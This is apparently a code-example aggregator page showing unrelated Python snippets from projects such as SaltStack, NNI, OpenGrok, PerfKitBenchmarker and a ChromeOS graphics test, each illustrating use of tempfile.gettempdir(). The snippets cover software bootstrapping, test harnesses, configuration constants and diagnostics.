        # To bootstrap Chocolatey
        salt '*' chocolatey.bootstrap
        salt '*' chocolatey.bootstrap force=True

        # To bootstrap Chocolatey offline from a file on the salt master
        salt '*' chocolatey.bootstrap source=salt://files/chocolatey.nupkg

        # To bootstrap Chocolatey from a file on C:\\Temp
        salt '*' chocolatey.bootstrap source=C:\\Temp\\chocolatey.nupkg
    """
    # Check if Chocolatey is already present in the path
    try:
        choc_path = _find_chocolatey()
    except CommandExecutionError:
        choc_path = None
    if choc_path and not force:
        return "Chocolatey found at {0}".format(choc_path)

    temp_dir = tempfile.gettempdir()

    # Make sure PowerShell is on the System if we're passing source
    # Vista and Windows Server 2008 do not have Powershell installed
    powershell_info = __salt__["cmd.shell_info"](shell="powershell")
    if not powershell_info["installed"]:
        # The following lookup tables are required to determine the correct
        # download required to install PowerShell. That's right, there's more
        # than one! You're welcome.
        ps_downloads = {
            (
                "Vista",
                "x86",
            ): "http://download.microsoft.com/download/A/7/5/A75BC017-63CE-47D6-8FA4-AFB5C21BAC54/Windows6.0-KB968930-x86.msu",
            (
                "Vista",
                "AMD64",
            ): "http://download.microsoft.com/download/3/C/8/3C8CF51E-1D9D-4DAA-AAEA-5C48D1CD055C/Windows6.0-KB968930-x64.msu",
            (
                "2008Server",
                "x86",
            ): "http://download.microsoft.com/download/F/9/E/F9EF6ACB-2BA8-4845-9C10-85FC4A69B207/Windows6.0-KB968930-x86.msu",
            (
                "2008Server",
                "AMD64",
            ): "http://download.microsoft.com/download/2/8/6/28686477-3242-4E96-9009-30B16BED89AF/Windows6.0-KB968930-x64.msu",
        }

        # PowerShell needs to be installed on older systems (Vista, 2008Server)
        if (__grains__["osrelease"], __grains__["cpuarch"]) in ps_downloads:

            # Install the appropriate release of PowerShell v2.0
            url = ps_downloads[(__grains__["osrelease"], __grains__["cpuarch"])]
            dest = os.path.join(temp_dir, os.path.basename(url))
            # Download the KB
            try:
                log.debug("Downloading PowerShell...")
                __salt__["cp.get_url"](path=url, dest=dest)
            except MinionError:
                err = "Failed to download PowerShell KB for {0}" "".format(
                    __grains__["osrelease"]
                )
                if source:
                    raise CommandExecutionError(
                        "{0}: PowerShell is required to bootstrap Chocolatey "
                        "with Source".format(err)
                    )
                raise CommandExecutionError(err)
            # Install the KB
            cmd = [dest, "/quiet", "/norestart"]
            log.debug("Installing PowerShell...")
            result = __salt__["cmd.run_all"](cmd, python_shell=False)
            if result["retcode"] != 0:
                err = (
                    "Failed to install PowerShell KB. For more information "
                    "run the installer manually on the host"
                )
                raise CommandExecutionError(err)
        else:
            err = "Windows PowerShell Installation not available"
            raise CommandNotFoundError(err)

    # Check that .NET v4.0+ is installed
    # Windows 7 / Windows Server 2008 R2 and below do not come with at least
    # .NET v4.0 installed
    if not __utils__["dotnet.version_at_least"](version="4"):
        # It took until .NET v4.0 for Microsoft got the hang of making
        # installers, this should work under any version of Windows
        url = "http://download.microsoft.com/download/1/B/E/1BE39E79-7E39-46A3-96FF-047F95396215/dotNetFx40_Full_setup.exe"
        dest = os.path.join(temp_dir, os.path.basename(url))
        # Download the .NET Framework 4 web installer
        try:
            log.debug("Downloading .NET v4.0...")
            __salt__["cp.get_url"](path=url, dest=dest)
        except MinionError:
            err = "Failed to download .NET v4.0 Web Installer"
            if source:
                err = (
                    "{0}: .NET v4.0+ is required to bootstrap "
                    "Chocolatey with Source".format(err)
                )
            raise CommandExecutionError(err)

        # Run the .NET Framework 4 web installer
        cmd = [dest, "/q", "/norestart"]
        log.debug("Installing .NET v4.0...")
        result = __salt__["cmd.run_all"](cmd, python_shell=False)
        if result["retcode"] != 0:
            err = (
                "Failed to install .NET v4.0 failed. For more information "
                "run the installer manually on the host"
            )
            raise CommandExecutionError(err)

    # Define target / destination
    if source:
        url = source
    else:
        url = "https://chocolatey.org/install.ps1"
    dest = os.path.join(temp_dir, os.path.basename(url))

    # Download Chocolatey installer
    try:
        log.debug("Downloading Chocolatey: {0}".format(os.path.basename(url)))
        script = __salt__["cp.get_url"](path=url, dest=dest)
        log.debug("Script: {0}".format(script))
    except MinionError:
        err = "Failed to download Chocolatey Installer"
        if source:
            err = "{0} from source"
        raise CommandExecutionError(err)

    # If this is a nupkg download we need to unzip it first
    if os.path.splitext(os.path.basename(dest))[1] == ".nupkg":
        log.debug("Unzipping Chocolatey: {0}".format(dest))
        __salt__["archive.unzip"](
            zip_file=dest,
            dest=os.path.join(os.path.dirname(dest), "chocolatey"),
            extract_perms=False,
        )
        script = os.path.join(
            os.path.dirname(dest), "chocolatey", "tools", "chocolateyInstall.ps1"
        )

    if not os.path.exists(script):
        raise CommandExecutionError(
            "Failed to find Chocolatey installation " "script: {0}".format(script)
        )

    # Run the Chocolatey bootstrap
    log.debug("Installing Chocolatey: {0}".format(script))
    result = __salt__["cmd.script"](
        script, cwd=os.path.dirname(script), shell="powershell", python_shell=True
    )
    if result["retcode"] != 0:
        err = "Bootstrapping Chocolatey failed: {0}".format(result["stderr"])
        raise CommandExecutionError(err)

    return result["stdout"]
Ejemplo n.º 53
0
job.SetNotifyFlags(bits.BG_NOTIFY_JOB_TRANSFERRED | bits.BG_NOTIFY_JOB_ERROR
                   | bits.BG_NOTIFY_JOB_MODIFICATION)

# The idea here is to intentionally make one of the files fail to be
# downloaded. Then the JobError notification will be triggered, where
# we do fix the failing file by calling SetRemoteName to a valid URL
# and call Resume() on the job, making the job finish successfully.
#
# Note to self: A domain that cannot be resolved will cause
# TRANSIENT_ERROR instead of ERROR, and the JobError notification will
# not be triggered! This can bite you during testing depending on how
# your DNS is configured. For example, if you use OpenDNS.org's DNS
# servers, an invalid hostname will *always* be resolved (they
# redirect you to a search page), so be careful when testing.
job.AddFile('http://www.python.org/favicon.ico',
            os.path.join(tempfile.gettempdir(), 'bits-favicon.ico'))
job.AddFile('http://www.python.org/missing-favicon.ico',
            os.path.join(tempfile.gettempdir(), 'bits-missing-favicon.ico'))

for f in job.EnumFiles():
    print 'Downloading', f.GetRemoteName()
    print 'To', f.GetLocalName()

job.Resume()

while True:
    rc = win32event.MsgWaitForMultipleObjects((StopEvent, ), 0, TIMEOUT,
                                              win32event.QS_ALLEVENTS)

    if rc == win32event.WAIT_OBJECT_0:
        break
Ejemplo n.º 54
0
import tempfile

file = __file__.split(':/cygwin')[-1]
http_root = os.path.dirname(os.path.dirname(os.path.abspath(os.path.dirname(file))))
sys.path.insert(0, http_root)

from resources.portabilityLayer import set_state, get_state
from urllib.parse import parse_qs

sys.stdout.write(
    'Content-Type: text/html\r\n'
    'Access-Control-Allow-Origin: *\r\n'
    'Access-Control-Allow-Headers: X-Custom-Header\r\n'
    'Access-Control-Max-Age: 0\r\n'
    '\r\n'
)

query = parse_qs(os.environ.get('QUERY_STRING', ''), keep_blank_values=True)
stateFile = os.path.join(tempfile.gettempdir(), query.get('filename', ['state.txt'])[0])

if os.environ.get('REQUEST_METHOD') == 'OPTIONS':
    if os.environ.get('HTTP_X_CUSTOM_HEADER'):
        set_state(stateFile, 'FAIL')
    else:
        set_state(stateFile, 'PASS')
else:
    if os.environ.get('HTTP_X_CUSTOM_HEADER'):
        sys.stdout.write(get_state(stateFile, default='FAIL'))
    else:
        sys.stdout.write('FAIL - no header in actual request')
Ejemplo n.º 55
0
import jinja2

from perfkitbenchmarker import context
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import log_util
from perfkitbenchmarker import regex_util

FLAGS = flags.FLAGS

PRIVATE_KEYFILE = 'perfkitbenchmarker_keyfile'
PUBLIC_KEYFILE = 'perfkitbenchmarker_keyfile.pub'
CERT_FILE = 'perfkitbenchmarker.pem'
TEMP_DIR = os.path.join(tempfile.gettempdir(), 'perfkitbenchmarker')

# The temporary directory on VMs. We cannot reuse GetTempDir()
# because run_uri will not be available at time of module load and we need
# to use this directory as a base for other module level constants.
VM_TMP_DIR = '/tmp/pkb'

# Default timeout for issuing a command.
DEFAULT_TIMEOUT = 300

# Defaults for retrying commands.
POLL_INTERVAL = 30
TIMEOUT = 1200
FUZZ = .5
MAX_RETRIES = -1
Ejemplo n.º 56
0
def run():
    _path = os.getcwd()
    os.chdir(tempfile.gettempdir())
    print("------")
    print("os.name=%r" % (os.name))
    print("------")
    print("sys.platform=%r" % (sys.platform))
    print("------")
    print("sys.version:")
    print(sys.version)
    print("------")
    print("sys.prefix:")
    print(sys.prefix)
    print("------")
    print("sys.path=%r" % (":".join(sys.path)))
    print("------")

    try:
        import numpy

        has_newnumpy = 1
    except ImportError:
        print("Failed to import new numpy:", sys.exc_info()[1])
        has_newnumpy = 0

    try:
        from numpy.f2py import f2py2e

        has_f2py2e = 1
    except ImportError:
        print("Failed to import f2py2e:", sys.exc_info()[1])
        has_f2py2e = 0

    try:
        import numpy.distutils

        has_numpy_distutils = 2
    except ImportError:
        try:
            import numpy_distutils

            has_numpy_distutils = 1
        except ImportError:
            print("Failed to import numpy_distutils:", sys.exc_info()[1])
            has_numpy_distutils = 0

    if has_newnumpy:
        try:
            print(
                "Found new numpy version %r in %s" % (numpy.__version__, numpy.__file__)
            )
        except Exception as msg:
            print("error:", msg)
            print("------")

    if has_f2py2e:
        try:
            print(
                "Found f2py2e version %r in %s"
                % (f2py2e.__version__.version, f2py2e.__file__)
            )
        except Exception as msg:
            print("error:", msg)
            print("------")

    if has_numpy_distutils:
        try:
            if has_numpy_distutils == 2:
                print(
                    "Found numpy.distutils version %r in %r"
                    % (numpy.distutils.__version__, numpy.distutils.__file__)
                )
            else:
                print(
                    "Found numpy_distutils version %r in %r"
                    % (
                        numpy_distutils.numpy_distutils_version.numpy_distutils_version,
                        numpy_distutils.__file__,
                    )
                )
            print("------")
        except Exception as msg:
            print("error:", msg)
            print("------")
        try:
            if has_numpy_distutils == 1:
                print("Importing numpy_distutils.command.build_flib ...", end=" ")
                import numpy_distutils.command.build_flib as build_flib

                print("ok")
                print("------")
                try:
                    print("Checking availability of supported Fortran compilers:")
                    for compiler_class in build_flib.all_compilers:
                        compiler_class(verbose=1).is_available()
                        print("------")
                except Exception as msg:
                    print("error:", msg)
                    print("------")
        except Exception as msg:
            print(
                "error:",
                msg,
                "(ignore it, build_flib is obsolute for numpy.distutils 0.2.2 and up)",
            )
            print("------")
        try:
            if has_numpy_distutils == 2:
                print("Importing numpy.distutils.fcompiler ...", end=" ")
                import numpy.distutils.fcompiler as fcompiler
            else:
                print("Importing numpy_distutils.fcompiler ...", end=" ")
                import numpy_distutils.fcompiler as fcompiler
            print("ok")
            print("------")
            try:
                print("Checking availability of supported Fortran compilers:")
                fcompiler.show_fcompilers()
                print("------")
            except Exception as msg:
                print("error:", msg)
                print("------")
        except Exception as msg:
            print("error:", msg)
            print("------")
        try:
            if has_numpy_distutils == 2:
                print("Importing numpy.distutils.cpuinfo ...", end=" ")
                from numpy.distutils.cpuinfo import cpuinfo

                print("ok")
                print("------")
            else:
                try:
                    print("Importing numpy_distutils.command.cpuinfo ...", end=" ")
                    from numpy_distutils.command.cpuinfo import cpuinfo

                    print("ok")
                    print("------")
                except Exception as msg:
                    print("error:", msg, "(ignore it)")
                    print("Importing numpy_distutils.cpuinfo ...", end=" ")
                    from numpy_distutils.cpuinfo import cpuinfo

                    print("ok")
                    print("------")
            cpu = cpuinfo()
            print("CPU information:", end=" ")
            for name in dir(cpuinfo):
                if name[0] == "_" and name[1] != "_" and getattr(cpu, name[1:])():
                    print(name[1:], end=" ")
            print("------")
        except Exception as msg:
            print("error:", msg)
            print("------")
    os.chdir(_path)
Ejemplo n.º 57
0
def launch_experiment(args, experiment_config, mode, config_file_name, experiment_id=None):
    '''follow steps to start rest server and start experiment'''
    nni_config = Config(config_file_name)
    # check packages for tuner
    package_name, module_name = None, None
    if experiment_config.get('tuner') and experiment_config['tuner'].get('builtinTunerName'):
        package_name = experiment_config['tuner']['builtinTunerName']
        module_name = ModuleName.get(package_name)
    elif experiment_config.get('advisor') and experiment_config['advisor'].get('builtinAdvisorName'):
        package_name = experiment_config['advisor']['builtinAdvisorName']
        module_name = AdvisorModuleName.get(package_name)
    if package_name and module_name:
        try:
            stdout_full_path, stderr_full_path = get_log_path(config_file_name)
            with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
                check_call([sys.executable, '-c', 'import %s'%(module_name)], stdout=stdout_file, stderr=stderr_file)
        except CalledProcessError:
            print_error('some errors happen when import package %s.' %(package_name))
            print_log_content(config_file_name)
            if package_name in PACKAGE_REQUIREMENTS:
                print_error('If %s is not installed, it should be installed through '\
                            '\'nnictl package install --name %s\''%(package_name, package_name))
            exit(1)
    log_dir = experiment_config['logDir'] if experiment_config.get('logDir') else None
    log_level = experiment_config['logLevel'] if experiment_config.get('logLevel') else None
    #view experiment mode do not need debug function, when view an experiment, there will be no new logs created
    if mode != 'view':
        if log_level not in ['trace', 'debug'] and (args.debug or experiment_config.get('debug') is True):
            log_level = 'debug'
    # start rest server
    rest_process, start_time = start_rest_server(args.port, experiment_config['trainingServicePlatform'], \
                                                 mode, config_file_name, experiment_id, log_dir, log_level)
    nni_config.set_config('restServerPid', rest_process.pid)
    # Deal with annotation
    if experiment_config.get('useAnnotation'):
        path = os.path.join(tempfile.gettempdir(), get_user(), 'nni', 'annotation')
        if not os.path.isdir(path):
            os.makedirs(path)
        path = tempfile.mkdtemp(dir=path)
        nas_mode = experiment_config['trial'].get('nasMode', 'classic_mode')
        code_dir = expand_annotations(experiment_config['trial']['codeDir'], path, nas_mode=nas_mode)
        experiment_config['trial']['codeDir'] = code_dir
        search_space = generate_search_space(code_dir)
        experiment_config['searchSpace'] = json.dumps(search_space)
        assert search_space, ERROR_INFO % 'Generated search space is empty'
    elif experiment_config.get('searchSpacePath'):
        search_space = get_json_content(experiment_config.get('searchSpacePath'))
        experiment_config['searchSpace'] = json.dumps(search_space)
    else:
        experiment_config['searchSpace'] = json.dumps('')

    # check rest server
    running, _ = check_rest_server(args.port)
    if running:
        print_normal('Successfully started Restful server!')
    else:
        print_error('Restful server start failed!')
        print_log_content(config_file_name)
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Rest server stopped!')
        exit(1)
    if mode != 'view':
        # set platform configuration
        set_platform_config(experiment_config['trainingServicePlatform'], experiment_config, args.port,\
                            config_file_name, rest_process)

    # start a new experiment
    print_normal('Starting experiment...')
    # set debug configuration
    if mode != 'view' and experiment_config.get('debug') is None:
        experiment_config['debug'] = args.debug
    response = set_experiment(experiment_config, mode, args.port, config_file_name)
    if response:
        if experiment_id is None:
            experiment_id = json.loads(response.text).get('experiment_id')
        nni_config.set_config('experimentId', experiment_id)
    else:
        print_error('Start experiment failed!')
        print_log_content(config_file_name)
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Restful server stopped!')
        exit(1)
    if experiment_config.get('nniManagerIp'):
        web_ui_url_list = ['{0}:{1}'.format(experiment_config['nniManagerIp'], str(args.port))]
    else:
        web_ui_url_list = get_local_urls(args.port)
    nni_config.set_config('webuiUrl', web_ui_url_list)

    # save experiment information
    nnictl_experiment_config = Experiments()
    nnictl_experiment_config.add_experiment(experiment_id, args.port, start_time, config_file_name,
                                            experiment_config['trainingServicePlatform'],
                                            experiment_config['experimentName'])

    print_normal(EXPERIMENT_SUCCESS_INFO % (experiment_id, '   '.join(web_ui_url_list)))
Ejemplo n.º 58
0
def main():
    ret = 0

    parser = argparse.ArgumentParser(description='project mirroring',
                                     parents=[get_baseparser(
                                         tool_version=__version__)
                                     ])

    parser.add_argument('project', nargs='*', default=None)
    parser.add_argument('-a', '--all', action='store_true',
                        help='mirror all indexed projects', default=False)
    parser.add_argument('-c', '--config',
                        help='config file in JSON/YAML format')
    parser.add_argument('-U', '--uri', default='http://localhost:8080/source',
                        help='uri of the webapp with context path')
    parser.add_argument('-b', '--batch', action='store_true',
                        help='batch mode - will log into a file')
    parser.add_argument('-B', '--backupcount', default=8,
                        help='how many log files to keep around in batch mode')
    parser.add_argument('-I', '--incoming', action='store_true',
                        help='Check for incoming changes, terminate the '
                             'processing if not found.')
    parser.add_argument('-w', '--workers', default=cpu_count(),
                        help='Number of worker processes')

    try:
        args = parser.parse_args()
    except ValueError as e:
        fatal(e)

    logger = get_console_logger(get_class_basename(), args.loglevel)

    if len(args.project) > 0 and args.all:
        fatal("Cannot use both project list and -a/--all")

    if not args.all and len(args.project) == 0:
        fatal("Need at least one project or --all")

    if args.config:
        config = read_config(logger, args.config)
        if config is None:
            fatal("Cannot read config file from {}".format(args.config))
    else:
        config = {}

    uri = args.uri
    if not is_web_uri(uri):
        fatal("Not a URI: {}".format(uri))
    logger.debug("web application URI = {}".format(uri))

    if not check_configuration(config):
        sys.exit(1)

    # Save the source root to avoid querying the web application.
    source_root = get_config_value(logger, 'sourceRoot', uri)
    if not source_root:
        sys.exit(1)

    logger.debug("Source root = {}".format(source_root))

    hookdir = config.get(HOOKDIR_PROPERTY)
    if hookdir:
        logger.debug("Hook directory = {}".format(hookdir))

    command_timeout = get_int(logger, "command timeout",
                              config.get(CMD_TIMEOUT_PROPERTY))
    if command_timeout:
        logger.debug("Global command timeout = {}".format(command_timeout))

    hook_timeout = get_int(logger, "hook timeout",
                           config.get(HOOK_TIMEOUT_PROPERTY))
    if hook_timeout:
        logger.debug("Global hook timeout = {}".format(hook_timeout))

    # Log messages to dedicated log file if running in batch mode.
    if args.batch:
        logdir = config.get(LOGDIR_PROPERTY)
        if not logdir:
            fatal("The {} property is required in batch mode".
                  format(LOGDIR_PROPERTY))

    projects = args.project
    if len(projects) == 1:
        lockfile = projects[0] + "-mirror"
    else:
        lockfile = os.path.basename(sys.argv[0])

    if args.all:
        projects = list_indexed_projects(logger, args.uri)

    lock = FileLock(os.path.join(tempfile.gettempdir(), lockfile + ".lock"))
    try:
        with lock.acquire(timeout=0):
            with Pool(processes=int(args.workers)) as pool:
                worker_args = []
                for x in projects:
                    worker_args.append([x, logdir, args.loglevel,
                                        args.backupcount, config,
                                        args.incoming,
                                        args.uri, source_root,
                                        args.batch])
                print(worker_args)
                try:
                    project_results = pool.map(worker, worker_args, 1)
                except KeyboardInterrupt:
                    sys.exit(1)
                else:
                    if any([True for x in project_results if x == 1]):
                        ret = 1
    except Timeout:
        logger.warning("Already running, exiting.")
        sys.exit(1)

    logging.shutdown()
    sys.exit(ret)
Ejemplo n.º 59
0
import pathlib
import tempfile

from decouple import config

PROJECT_NAME = "shipit/api"
APP_NAME = "shipit_api"
SCOPE_PREFIX = f"project:releng:services/{APP_NAME}"

# A route key that triggers rebuild of product details.
# Worker will listen to this route key to trigger the rebuild.
PULSE_ROUTE_REBUILD_PRODUCT_DETAILS = "rebuild_product_details"

# A folder where we will keep a checkout of product details
PRODUCT_DETAILS_DIR = pathlib.Path(tempfile.gettempdir(), "product-details")
PRODUCT_DETAILS_NEW_DIR = pathlib.Path(tempfile.gettempdir(),
                                       "product-details-new")
PRODUCT_DETAILS_CACHE_DIR = pathlib.Path(tempfile.gettempdir(),
                                         "product-details-cache")

# Use CURRENT_ESR-1. Releases with major version equal or less than the
# breakpoint version will be served using static files. No related
# product-details data will be generated if we decide to ship a dot release
# with major version <= BREAKPOINT_VERSION. This includes Firefox (release,
# esr, beta, devedition, pinebuild), Fennec and Thunderbird.
BREAKPOINT_VERSION = 90

# When there is only one ESR release ESR_NEXT is set to '' and ESR_CURRENT is
# set to current ESR major version.  When we have 2 ESR releases, ESR_CURRENT
# should be using the major version of the older release, while ESR_NEXT should
    def run_once(self, opts=None):
        options = dict(
            filter='',
            test_names='',  # e.g., dEQP-GLES3.info.version,
            # dEQP-GLES2.functional,
            # dEQP-GLES3.accuracy.texture, etc.
            test_names_file='',
            timeout=self._timeout,
            subset_to_run='Pass',  # Pass, Fail, Timeout, NotPass...
            hasty='False',
            shard_number='0',
            shard_count='1',
            debug='False',
            perf_failure_description=None)
        if opts is None:
            opts = []
        options.update(utils.args_to_dict(opts))
        logging.info('Test Options: %s', options)

        self._hasty = (options['hasty'] == 'True')
        self._timeout = int(options['timeout'])
        self._test_names_file = options['test_names_file']
        self._test_names = options['test_names']
        self._shard_number = int(options['shard_number'])
        self._shard_count = int(options['shard_count'])
        self._debug = (options['debug'] == 'True')
        if not (self._test_names_file or self._test_names):
            self._filter = options['filter']
            if not self._filter:
                raise error.TestFail('Failed: No dEQP test filter specified')
        if options['perf_failure_description']:
            self._test_failure_description = options[
                'perf_failure_description']
        else:
            # Do not report failure if failure description is not specified.
            self._test_failure_report_enable = False

        # Some information to help post-process logs into blacklists later.
        logging.info('ChromeOS BOARD = %s', self._board)
        logging.info('ChromeOS CPU family = %s', self._cpu_type)
        logging.info('ChromeOS GPU family = %s', self._gpu_type)

        # Create a place to put detailed test output logs.
        filter_name = self._filter or os.path.basename(self._test_names_file)
        logging.info('dEQP test filter = %s', filter_name)
        self._log_path = os.path.join(tempfile.gettempdir(),
                                      '%s-logs' % filter_name)
        shutil.rmtree(self._log_path, ignore_errors=True)
        os.mkdir(self._log_path)

        # Load either tests specified by test_names_file, test_names or filter.
        test_cases = []
        if self._test_names_file:
            test_cases = self._get_test_cases_from_names_file()
        elif self._test_names:
            test_cases = []
            for name in self._test_names.split(','):
                test_cases.extend(self._get_test_cases(name, 'Pass'))
        elif self._filter:
            test_cases = self._get_test_cases(self._filter,
                                              options['subset_to_run'])

        if self._debug:
            # LogReader works on /var/log/messages by default.
            self._log_reader = cros_logging.LogReader()
            self._log_reader.set_start_by_current()

        # Assume all tests failed at the beginning.
        for test_case in test_cases:
            self.add_failures(test_case)

        test_results, failing_test = self._run_once(test_cases)
        # Rerun the test if we are in hasty mode.
        if self._hasty and len(failing_test) > 0:
            if len(failing_test) < sum(test_results.values()) * RERUN_RATIO:
                logging.info('Because we are in hasty mode, we will rerun the '
                             'failing tests one at a time')
                rerun_results, failing_test = self._run_once(failing_test)
                # Update failing test result from the test_results
                for result in test_results:
                    if result.lower() not in self.TEST_RESULT_FILTER:
                        test_results[result] = 0
                for result in rerun_results:
                    test_results[result] = (test_results.get(result, 0) +
                                            rerun_results[result])
            else:
                logging.info('There are too many failing tests. It would '
                             'take too long to rerun them. Giving up.')

        # Update failing tests to the chrome perf dashboard records.
        for test_case in test_cases:
            if test_case not in failing_test:
                self.remove_failures(test_case)

        logging.info('Test results:')
        logging.info(test_results)
        logging.debug('Test Failed: %s', failing_test)
        self.write_perf_keyval(test_results)

        test_count = 0
        test_failures = 0
        test_passes = 0
        test_skipped = 0
        for result in test_results:
            test_count += test_results[result]
            if result.lower() in ['pass']:
                test_passes += test_results[result]
            if result.lower() not in self.TEST_RESULT_FILTER:
                test_failures += test_results[result]
            if result.lower() in ['skipped']:
                test_skipped += test_results[result]
        # The text "Completed all tests." is used by the process_log.py script
        # and should always appear at the end of a completed test run.
        logging.info(
            'Completed all tests. Saw %d tests, %d passes and %d failures.',
            test_count, test_passes, test_failures)

        if self._filter and test_count == 0 and options[
                'subset_to_run'] != 'NotPass':
            logging.warning('No test cases found for filter: %s!',
                            self._filter)

        if test_failures:
            raise error.TestFail('Failed: on %s %d/%d tests failed.' %
                                 (self._gpu_type, test_failures, test_count))
        if test_skipped > 0:
            logging.info('On %s %d tests skipped, %d passes', self._gpu_type,
                         test_skipped, test_passes)